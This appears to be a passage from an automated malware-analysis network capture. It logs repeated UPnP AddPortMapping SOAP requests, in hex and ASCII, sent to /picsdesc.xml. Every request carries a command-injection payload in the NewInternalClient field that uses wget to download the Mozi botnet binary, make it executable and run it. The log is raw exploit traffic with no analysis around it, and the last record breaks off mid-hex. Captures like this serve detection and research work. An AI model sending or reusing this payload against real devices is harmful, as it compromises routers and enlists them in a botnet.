                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                        Jan 6, 2021 14:58:57.790584087 CET555OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: /
                                                                                                        User-Agent: Hello-World
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                        Jan 6, 2021 14:58:58.922597885 CET558OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: /
                                                                                                        User-Agent: Hello-World
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                        Jan 6, 2021 14:59:01.182790995 CET571OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: /
                                                                                                        User-Agent: Hello-World
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                        Jan 6, 2021 14:59:05.703001022 CET593OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: /
                                                                                                        User-Agent: Hello-World
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                        Jan 6, 2021 14:59:14.759443998 CET638OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: /
                                                                                                        User-Agent: Hello-World
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                        Jan 6, 2021 14:59:32.872359037 CET728OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: /
                                                                                                        User-Agent: Hello-World
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://192.168.1.1:8088/Mozi.m; chmod +x Mozi.m; ./Mozi.m</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
                                                                                                        Jan 6, 2021 15:00:09.098093987 CET896OUTPOST /picsdesc.xml HTTP/1.1
                                                                                                        Content-Length: 630
                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                                                                        Accept: /
                                                                                                        User-Agent: Hello-World
                                                                                                        Connection: keep-alive
                                                                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 30 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 63 64 20 2f 76 61 72 2f 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 3b 20 63 68 6d 6f 64 20 2b 78 20 4d 6f 7a 69 2e 6d 3b 20 2e 2f 4d 6f 7a 69 2e 6d 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 